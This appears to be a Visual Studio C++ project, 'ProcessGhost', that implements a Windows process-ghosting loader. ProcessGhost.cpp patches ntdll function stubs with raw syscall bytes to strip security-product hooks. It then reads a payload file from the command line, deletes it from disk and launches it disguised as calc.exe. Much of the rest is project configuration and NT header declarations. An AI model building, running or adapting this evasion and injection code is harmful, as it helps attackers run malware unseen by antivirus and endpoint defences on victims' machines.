├── ProcessGhost.sln
├── ProcessGhost
    ├── PG.h
    ├── ProcessGhost.cpp
    ├── ProcessGhost.vcxproj
    ├── ProcessGhost.vcxproj.filters
    ├── ProcessGhost.vcxproj.user
    ├── ntddk.h
    ├── ntdll_types.h
    ├── ntdll_undoc.cpp
    ├── ntdll_undoc.h
    ├── pgheader.h
    ├── syscall.asm
    └── syscall.h
└── README.md


/ProcessGhost.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31019.35
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ProcessGhost", "ProcessGhost\ProcessGhost.vcxproj", "{C9A26E47-8617-4122-951E-3F1D013E4F8B}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{C9A26E47-8617-4122-951E-3F1D013E4F8B}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{C9A26E47-8617-4122-951E-3F1D013E4F8B}.Debug|x64.Build.0 = Debug|x64
18 | 		{C9A26E47-8617-4122-951E-3F1D013E4F8B}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{C9A26E47-8617-4122-951E-3F1D013E4F8B}.Debug|x86.Build.0 = Debug|Win32
20 | 		{C9A26E47-8617-4122-951E-3F1D013E4F8B}.Release|x64.ActiveCfg = Release|x64
21 | 		{C9A26E47-8617-4122-951E-3F1D013E4F8B}.Release|x64.Build.0 = Release|x64
22 | 		{C9A26E47-8617-4122-951E-3F1D013E4F8B}.Release|x86.ActiveCfg = Release|Win32
23 | 		{C9A26E47-8617-4122-951E-3F1D013E4F8B}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {A73627C4-F42B-41F2-8E36-D32E23FDFA79}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/ProcessGhost/PG.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include<Windows.h>
 3 | #include "ntddk.h"
 4 | #include <userenv.h>
 5 | #include <iostream>
 6 | #include "syscall.h"
 7 | #define PS_INHERIT_HANDLES                      4
 8 | #define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
 9 | using namespace std;
10 | /*
11 | * get calc.exe path by enviroment 
12 | * outPath the path of calc.exe
13 | * outSize the size of path
14 | * 
15 | */
16 | BOOL get_calc_path(LPWSTR outPath, DWORD outSize) {
17 | 	ExpandEnvironmentStringsW(L"%SystemRoot%\\system32\\calc.exe", outPath, outSize);
18 | 	return true;
19 | }
20 | /*
21 | * get image in memory from target exe
22 | * filename file path of target exe
23 | * r_size size of file path
24 | */
25 | 
26 | BYTE* buffer_payload(wchar_t *filename, OUT size_t &r_size) {
27 | 	HANDLE file = CreateFileW(filename, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
28 | 	if (file == INVALID_HANDLE_VALUE) {
29 | 		cout << "create file fail!\n" << endl;
30 | 	}
31 | 	HANDLE mapping = CreateFileMapping(file, 0, PAGE_READONLY, 0, 0, 0);
32 | 	if (!mapping) {
33 | 		CloseHandle(file);
34 | 		return nullptr;
35 | 		cout << "create map fail!\n" << endl;
36 | 	}
37 | 	BYTE* dllRawData = (BYTE*)MapViewOfFile(mapping, FILE_MAP_READ, 0, 0, 0);
38 | 	if (dllRawData == nullptr) {
39 | 		cout << "map move fail!\n" << endl;
40 | 		CloseHandle(mapping);
41 | 		CloseHandle(file);
42 | 		return nullptr;
43 | 	}
44 | 	r_size = GetFileSize(file, 0);
45 | 	BYTE* localCopyAddress = (BYTE*)VirtualAlloc(NULL, r_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
46 | 	memcpy(localCopyAddress, dllRawData, r_size);
47 | 	UnmapViewOfFile(dllRawData);
48 | 	CloseHandle(mapping);
49 | 	CloseHandle(file);
50 | 	return localCopyAddress;
51 | 
52 | }
53 | 
54 | 
55 | 
56 | 
57 | 
58 | 
59 | 
60 | 
61 | 
62 | 
63 | 
64 | 
65 | 
66 | 
67 | 
68 | 
69 | 
70 | 
71 | 
72 | 
73 | 
74 | 
75 | 


--------------------------------------------------------------------------------
/ProcessGhost/ProcessGhost.cpp:
--------------------------------------------------------------------------------
 1 | 
 2 | #include"ntdll_undoc.h"
 3 | #include "PG.h"
 4 | #include"pgheader.h"
 5 | 
 6 | 
 7 | typedef NTSTATUS(NTAPI* _RtlGetVersion)(
 8 |     LPOSVERSIONINFOEXW lpVersionInformation
 9 |     );
10 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
11 | 
12 | void free_buffer(BYTE* buffer, size_t buffer_size)
13 | {
14 |     if (buffer == NULL) return;
15 |     VirtualFree(buffer, buffer_size, MEM_DECOMMIT);
16 | }
17 | BOOL Unhook_NativeAPI(int SystemCall, LPCSTR ApiName) {
18 |     BYTE AssemblyBytes[] = { 0x4C, 0x8B, 0xD1, 0xB8, 0xFF };
19 | 
20 |     AssemblyBytes[4] = SystemCall;//传入函数的调用号
21 | 
22 |     LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), ApiName);
23 |     //lpapicall的值是NtReadVirtualMemory，此处获取函数的地址
24 | 
25 |     LPVOID lpBaseAddress = lpProcAddress;
26 |     ULONG OldProtection, NewProtection;
27 |     SIZE_T uSize = 10;
28 |     NTSTATUS status = NtProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
29 |     //修改内存为可读可写可执行
30 |     if (status != STATUS_SUCCESS) {
31 |         wprintf(L"	[!] ZwProtectVirtualMemory failed.\n");
32 |         return FALSE;
33 |     }
34 |     status = NtWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL);
35 |     if (status != STATUS_SUCCESS) {
36 |         wprintf(L"	[!] ZwWriteVirtualMemory failed.\n");
37 |         return FALSE;
38 |     }
39 |     //修改回原本的内存保护状态
40 |     status = NtProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
41 |     if (status != STATUS_SUCCESS) {
42 |         wprintf(L"	[!] ZwProtectVirtualMemory failed.\n");
43 |         return FALSE;
44 |     }
45 | 
46 |     return TRUE;
47 | }
48 | 
49 | int wmain(int argc, wchar_t* argv[])
50 | {
51 |     OSVERSIONINFOEXW osInfo;
52 |     RtlGetVersion(&osInfo);
53 |     DWORD version = osInfo.dwMajorVersion;
54 |     if (version == 10) {
55 |         Unhook_NativeAPI(0x3F, "NtReadVirtualMemory");
56 |         Unhook_NativeAPI(0x18, "NtAllocateVirtualMemory");
57 |         Unhook_NativeAPI(0x3a, "NtWriteVirtualMemory");
58 | 
59 |     }
60 |     else {
61 |         Unhook_NativeAPI(0x3c, "NtReadVirtualMemory");
62 |         Unhook_NativeAPI(0x15, "NtReadVirtualMemory");
63 |         Unhook_NativeAPI(0x37, "NtReadVirtualMemory");
64 |     }
65 |     //bypass ntcreateprocess()
66 | 
67 |     if (!init_ntdll_func()) {
68 |         return -1;
69 |     }
70 |     wchar_t target[MAX_PATH] = { 0 };
71 |     if (!get_calc_path(target, MAX_PATH))
72 |         return -1;
73 |     wchar_t* targetPath = target;
74 |     wchar_t* payloadPath = argv[1];
75 |     size_t payloadSize = 0;
76 |     BYTE* payladBuf = buffer_payload(payloadPath, payloadSize);
77 |     if (payladBuf == NULL) {
78 |         cout<< "Cannot read payload!\n" <<endl;
79 |         return -1;
80 |     }
81 |     if (!DeleteFileW(payloadPath)) {
82 |         cout << "delete fail!\n" << endl;
83 |     }
84 |     bool is_ok = process_ghost(targetPath, payladBuf, (DWORD)payloadSize);
85 |     free_buffer(payladBuf, payloadSize);
86 |     if (is_ok) {
87 |         std::cerr << "[+] Done!" << std::endl;
88 |     }
89 |     else {
90 |         std::cerr << "[-] Failed!" << std::endl;
91 |     }
92 |     
93 | }
94 | 
95 | 
96 | 


--------------------------------------------------------------------------------
/ProcessGhost/ProcessGhost.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{c9a26e47-8617-4122-951e-3f1d013e4f8b}</ProjectGuid>
 25 |     <RootNamespace>ProcessGhost</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |     <UseOfMfc>Static</UseOfMfc>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>Application</ConfigurationType>
 38 |     <UseDebugLibraries>false</UseDebugLibraries>
 39 |     <PlatformToolset>v142</PlatformToolset>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <CharacterSet>Unicode</CharacterSet>
 42 |     <UseOfMfc>Static</UseOfMfc>
 43 |   </PropertyGroup>
 44 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 45 |     <ConfigurationType>Application</ConfigurationType>
 46 |     <UseDebugLibraries>true</UseDebugLibraries>
 47 |     <PlatformToolset>v142</PlatformToolset>
 48 |     <CharacterSet>Unicode</CharacterSet>
 49 |     <UseOfMfc>Static</UseOfMfc>
 50 |   </PropertyGroup>
 51 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 52 |     <ConfigurationType>Application</ConfigurationType>
 53 |     <UseDebugLibraries>false</UseDebugLibraries>
 54 |     <PlatformToolset>v142</PlatformToolset>
 55 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 56 |     <CharacterSet>Unicode</CharacterSet>
 57 |     <UseOfMfc>Static</UseOfMfc>
 58 |   </PropertyGroup>
 59 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 60 |   <ImportGroup Label="ExtensionSettings">
 61 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="Shared">
 64 |   </ImportGroup>
 65 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 66 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 67 |   </ImportGroup>
 68 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 69 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 70 |   </ImportGroup>
 71 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 72 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 73 |   </ImportGroup>
 74 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 75 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 76 |   </ImportGroup>
 77 |   <PropertyGroup Label="UserMacros" />
 78 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 79 |     <LinkIncremental>true</LinkIncremental>
 80 |   </PropertyGroup>
 81 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 82 |     <LinkIncremental>false</LinkIncremental>
 83 |   </PropertyGroup>
 84 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 85 |     <LinkIncremental>true</LinkIncremental>
 86 |   </PropertyGroup>
 87 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 88 |     <LinkIncremental>false</LinkIncremental>
 89 |   </PropertyGroup>
 90 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 91 |     <ClCompile>
 92 |       <WarningLevel>Level3</WarningLevel>
 93 |       <SDLCheck>true</SDLCheck>
 94 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 95 |       <ConformanceMode>true</ConformanceMode>
 96 |     </ClCompile>
 97 |     <Link>
 98 |       <SubSystem>Console</SubSystem>
 99 |       <GenerateDebugInformation>true</GenerateDebugInformation>
100 |       <AdditionalDependencies>ntdll.lib;Userenv.lib;%(AdditionalDependencies)</AdditionalDependencies>
101 |     </Link>
102 |   </ItemDefinitionGroup>
103 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
104 |     <ClCompile>
105 |       <WarningLevel>Level3</WarningLevel>
106 |       <FunctionLevelLinking>true</FunctionLevelLinking>
107 |       <IntrinsicFunctions>true</IntrinsicFunctions>
108 |       <SDLCheck>true</SDLCheck>
109 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
110 |       <ConformanceMode>true</ConformanceMode>
111 |     </ClCompile>
112 |     <Link>
113 |       <SubSystem>Console</SubSystem>
114 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
115 |       <OptimizeReferences>true</OptimizeReferences>
116 |       <GenerateDebugInformation>true</GenerateDebugInformation>
117 |       <AdditionalDependencies>ntdll.lib;Userenv.lib;%(AdditionalDependencies)</AdditionalDependencies>
118 |     </Link>
119 |   </ItemDefinitionGroup>
120 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
121 |     <ClCompile>
122 |       <WarningLevel>Level3</WarningLevel>
123 |       <SDLCheck>true</SDLCheck>
124 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
125 |       <ConformanceMode>true</ConformanceMode>
126 |     </ClCompile>
127 |     <Link>
128 |       <SubSystem>Console</SubSystem>
129 |       <GenerateDebugInformation>true</GenerateDebugInformation>
130 |       <AdditionalDependencies>ntdll.lib;Userenv.lib;%(AdditionalDependencies)</AdditionalDependencies>
131 |     </Link>
132 |   </ItemDefinitionGroup>
133 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
134 |     <ClCompile>
135 |       <WarningLevel>Level3</WarningLevel>
136 |       <FunctionLevelLinking>true</FunctionLevelLinking>
137 |       <IntrinsicFunctions>true</IntrinsicFunctions>
138 |       <SDLCheck>true</SDLCheck>
139 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
140 |       <ConformanceMode>true</ConformanceMode>
141 |     </ClCompile>
142 |     <Link>
143 |       <SubSystem>Console</SubSystem>
144 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
145 |       <OptimizeReferences>true</OptimizeReferences>
146 |       <GenerateDebugInformation>true</GenerateDebugInformation>
147 |       <AdditionalDependencies>ntdll.lib;Userenv.lib;%(AdditionalDependencies)</AdditionalDependencies>
148 |     </Link>
149 |   </ItemDefinitionGroup>
150 |   <ItemGroup>
151 |     <ClCompile Include="ntdll_undoc.cpp" />
152 |     <ClCompile Include="ProcessGhost.cpp" />
153 |   </ItemGroup>
154 |   <ItemGroup>
155 |     <ClInclude Include="ntddk.h" />
156 |     <ClInclude Include="ntdll_types.h" />
157 |     <ClInclude Include="ntdll_undoc.h" />
158 |     <ClInclude Include="PG.h" />
159 |     <ClInclude Include="pgheader.h" />
160 |     <ClInclude Include="syscall.h" />
161 |   </ItemGroup>
162 |   <ItemGroup>
163 |     <MASM Include="syscall.asm">
164 |       <FileType>Document</FileType>
165 |     </MASM>
166 |   </ItemGroup>
167 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
168 |   <ImportGroup Label="ExtensionTargets">
169 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
170 |   </ImportGroup>
171 | </Project>


--------------------------------------------------------------------------------
/ProcessGhost/ProcessGhost.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="源文件">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="头文件">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="资源文件">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="ProcessGhost.cpp">
19 |       <Filter>源文件</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="ntdll_undoc.cpp">
22 |       <Filter>源文件</Filter>
23 |     </ClCompile>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClInclude Include="ntddk.h">
27 |       <Filter>头文件</Filter>
28 |     </ClInclude>
29 |     <ClInclude Include="PG.h">
30 |       <Filter>头文件</Filter>
31 |     </ClInclude>
32 |     <ClInclude Include="pgheader.h">
33 |       <Filter>头文件</Filter>
34 |     </ClInclude>
35 |     <ClInclude Include="ntdll_undoc.h">
36 |       <Filter>头文件</Filter>
37 |     </ClInclude>
38 |     <ClInclude Include="ntdll_types.h">
39 |       <Filter>头文件</Filter>
40 |     </ClInclude>
41 |     <ClInclude Include="syscall.h">
42 |       <Filter>头文件</Filter>
43 |     </ClInclude>
44 |   </ItemGroup>
45 |   <ItemGroup>
46 |     <MASM Include="syscall.asm">
47 |       <Filter>源文件</Filter>
48 |     </MASM>
49 |   </ItemGroup>
50 | </Project>


--------------------------------------------------------------------------------
/ProcessGhost/ProcessGhost.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/ProcessGhost/ntddk.h:
--------------------------------------------------------------------------------
   1 | #ifndef __NTDLL_H__
   2 | #define __NTDLL_H__
   3 | 
   4 | #ifdef __cplusplus
   5 | extern "C" {
   6 | #endif
   7 | #include <Windows.h>
   8 | 
   9 | #ifdef _NTDDK_
  10 | #error This header cannot be compiled together with NTDDK
  11 | #endif
  12 | /*
  13 | //Do not insert the library. Only definitions.
  14 | 
  15 | #ifndef _NTDLL_SELF_                            // Auto-insert the library
  16 | #pragma comment(lib, "Ntdll.lib")
  17 | #endif
  18 | */
  19 | #pragma warning(disable: 4201)                  // nonstandard extension used : nameless struct/union
  20 | 
  21 | #pragma warning(push)
  22 | #pragma warning(disable:4005)
  23 | #include <ntstatus.h>
  24 | #pragma warning(pop)
  25 | 
  26 | //------------------------------------------------------------------------------
  27 | // Defines for NTSTATUS
  28 | 
  29 | typedef long NTSTATUS;
  30 | 
  31 | #ifndef NT_SUCCESS
  32 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
  33 | #endif
  34 | 
  35 | #ifndef STATUS_SUCCESS
  36 | #define STATUS_SUCCESS       ((NTSTATUS)0x00000000L)
  37 | #endif
  38 | 
  39 | #ifndef STATUS_UNSUCCESSFUL
  40 | #define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
  41 | #endif
  42 | 
  43 | #ifndef ASSERT
  44 | #ifdef _DEBUG
  45 | #define ASSERT(x) assert(x)
  46 | #else
  47 | #define ASSERT(x) /* x */
  48 | #endif
  49 | #endif
  50 | 
  51 | //------------------------------------------------------------------------------
  52 | // Structures
  53 | 
  54 | typedef enum _EVENT_TYPE
  55 | {
  56 |     NotificationEvent,
  57 |     SynchronizationEvent
  58 | 
  59 | } EVENT_TYPE;
  60 | 
  61 | //
  62 | // ANSI strings are counted 8-bit character strings. If they are
  63 | // NULL terminated, Length does not include trailing NULL.
  64 | //
  65 | 
  66 | #ifndef _NTSECAPI_
  67 | typedef struct _STRING
  68 | {
  69 |     USHORT Length;
  70 |     USHORT MaximumLength;
  71 |     PCHAR  Buffer;
  72 | 
  73 | } STRING, *PSTRING;
  74 | 
  75 | //
  76 | // Unicode strings are counted 16-bit character strings. If they are
  77 | // NULL terminated, Length does not include trailing NULL.
  78 | //
  79 | 
  80 | typedef struct _UNICODE_STRING
  81 | {
  82 |     USHORT Length;
  83 |     USHORT MaximumLength;
  84 |     PWSTR  Buffer;
  85 | 
  86 | } UNICODE_STRING, *PUNICODE_STRING;
  87 | #endif // _NTSECAPI_
  88 | 
  89 | typedef STRING ANSI_STRING;
  90 | typedef PSTRING PANSI_STRING;
  91 | 
  92 | typedef STRING OEM_STRING;
  93 | typedef PSTRING POEM_STRING;
  94 | typedef CONST STRING* PCOEM_STRING;
  95 | 
  96 | typedef const UNICODE_STRING *PCUNICODE_STRING;
  97 | 
  98 | #define UNICODE_NULL ((WCHAR)0) // winnt
  99 | 
 100 | //
 101 | // Valid values for the Attributes field
 102 | //
 103 | 
 104 | #ifndef OBJ_CASE_INSENSITIVE
 105 | #define OBJ_INHERIT             0x00000002L
 106 | #define OBJ_PERMANENT           0x00000010L
 107 | #define OBJ_EXCLUSIVE           0x00000020L
 108 | #define OBJ_CASE_INSENSITIVE    0x00000040L
 109 | #define OBJ_OPENIF              0x00000080L
 110 | #define OBJ_OPENLINK            0x00000100L
 111 | #define OBJ_KERNEL_HANDLE       0x00000200L
 112 | #define OBJ_FORCE_ACCESS_CHECK  0x00000400L
 113 | #define OBJ_VALID_ATTRIBUTES    0x000007F2L
 114 | 
 115 | //
 116 | // Object Attributes structure
 117 | //
 118 | 
 119 | typedef struct _OBJECT_ATTRIBUTES
 120 | {
 121 |     ULONG Length;
 122 |     HANDLE RootDirectory;
 123 |     PUNICODE_STRING ObjectName;
 124 |     ULONG Attributes;
 125 |     PVOID SecurityDescriptor;        // Points to type SECURITY_DESCRIPTOR
 126 |     PVOID SecurityQualityOfService;  // Points to type SECURITY_QUALITY_OF_SERVICE
 127 | 
 128 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
 129 | #endif  // OBJ_CASE_INSENSITIVE
 130 | 
 131 | //
 132 | // IO_STATUS_BLOCK
 133 | //
 134 | 
 135 | typedef struct _IO_STATUS_BLOCK
 136 | {
 137 |     union
 138 |     {
 139 |         NTSTATUS Status;
 140 |         PVOID Pointer;
 141 |     };
 142 | 
 143 |     ULONG_PTR Information;
 144 | 
 145 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
 146 | 
 147 | //
 148 | // ClientId
 149 | //
 150 | 
 151 | typedef struct _CLIENT_ID
 152 | {
 153 |     HANDLE UniqueProcess;
 154 |     HANDLE UniqueThread;
 155 | 
 156 | } CLIENT_ID, *PCLIENT_ID;
 157 | 
 158 | 
 159 | //
 160 | // CURDIR structure
 161 | //
 162 | 
 163 | typedef struct _CURDIR
 164 | {
 165 |     UNICODE_STRING DosPath;
 166 |     HANDLE Handle;
 167 | 
 168 | } CURDIR, *PCURDIR;
 169 | 
 170 | 
 171 | //------------------------------------------------------------------------------
 172 | // Macros
 173 | 
 174 | // INIT_UNICODE_STRING is a replacement of RtlInitUnicodeString
 175 | #ifndef INIT_UNICODE_STRING
 176 | #define INIT_UNICODE_STRING(us, wch)                 \
 177 |     us.MaximumLength = (USHORT)sizeof(wch);          \
 178 |     us.Length        = (USHORT)(wcslen(wch) * sizeof(WCHAR)); \
 179 |     us.Buffer        = wch
 180 | #endif
 181 | 
 182 | 
 183 | #ifndef InitializeObjectAttributes
 184 | #define InitializeObjectAttributes( p, n, a, r, s ) {   \
 185 |     (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
 186 |     (p)->RootDirectory = r;                             \
 187 |     (p)->Attributes = a;                                \
 188 |     (p)->ObjectName = n;                                \
 189 |     (p)->SecurityDescriptor = s;                        \
 190 |     (p)->SecurityQualityOfService = NULL;               \
 191 |     }
 192 | #endif
 193 | 
 194 | 
 195 | #ifndef InitializePortHeader
 196 | #define InitializeMessageHeader( ph, l, t ) {                  \
 197 |     (ph)->TotalLength    = (USHORT)(l);                        \
 198 |     (ph)->DataLength     = (USHORT)(l - sizeof(PORT_MESSAGE)); \
 199 |     (ph)->Type           = (USHORT)(t);                        \
 200 |     (ph)->VirtualRangesOffset = 0;                             \
 201 |     }
 202 | #endif
 203 | 
 204 | //-----------------------------------------------------------------------------
 205 | // Image functions
 206 | 
 207 | NTSYSAPI
 208 | PVOID
 209 | NTAPI
 210 | RtlImageNtHeader (
 211 |     IN PVOID BaseAddress
 212 |     );
 213 | 
 214 | NTSYSAPI
 215 | PVOID
 216 | NTAPI 
 217 | RtlImageDirectoryEntryToData (
 218 |     IN PVOID Base,
 219 |     IN BOOLEAN MappedAsImage,
 220 |     IN USHORT DirectoryEntry,
 221 |     OUT PULONG Size
 222 |     );
 223 | 
 224 | //-----------------------------------------------------------------------------
 225 | // Unicode string functions
 226 | 
 227 | NTSYSAPI
 228 | NTSTATUS
 229 | NTAPI
 230 | RtlStringFromGUID( 
 231 |     IN REFGUID Guid,
 232 |     OUT PUNICODE_STRING GuidString
 233 |     );
 234 | 
 235 | 
 236 | NTSYSAPI
 237 | VOID
 238 | NTAPI
 239 | RtlInitUnicodeString(
 240 |     PUNICODE_STRING DestinationString,
 241 |     PCWSTR SourceString
 242 |     );
 243 | 
 244 | 
 245 | NTSYSAPI
 246 | BOOLEAN
 247 | NTAPI
 248 | RtlCreateUnicodeString(
 249 |     OUT PUNICODE_STRING DestinationString,
 250 |     IN PCWSTR SourceString
 251 |     );
 252 | 
 253 | 
 254 | NTSYSAPI
 255 | BOOLEAN
 256 | NTAPI
 257 | RtlCreateUnicodeStringFromAsciiz(
 258 |     OUT PUNICODE_STRING Destination,
 259 |     IN PCSTR Source
 260 |     );
 261 | 
 262 | 
 263 | NTSYSAPI
 264 | BOOLEAN
 265 | NTAPI
 266 | RtlPrefixUnicodeString (
 267 |     IN PUNICODE_STRING String1,
 268 |     IN PUNICODE_STRING String2,
 269 |     IN BOOLEAN CaseInSensitive
 270 |     );
 271 | 
 272 | 
 273 | NTSYSAPI
 274 | NTSTATUS
 275 | NTAPI
 276 | RtlDuplicateUnicodeString(
 277 |     IN  BOOLEAN AllocateNew,
 278 |     IN  PUNICODE_STRING SourceString,
 279 |     OUT PUNICODE_STRING TargetString
 280 |     );
 281 | 
 282 | 
 283 | NTSYSAPI
 284 | NTSTATUS
 285 | NTAPI
 286 | RtlAppendUnicodeToString (
 287 |     PUNICODE_STRING Destination,
 288 |     PCWSTR Source
 289 |     );
 290 | 
 291 | 
 292 | NTSYSAPI
 293 | NTSTATUS
 294 | NTAPI
 295 | RtlAppendUnicodeStringToString(
 296 |     IN OUT PUNICODE_STRING Destination,
 297 |     IN PUNICODE_STRING Source
 298 |     );
 299 | 
 300 | 
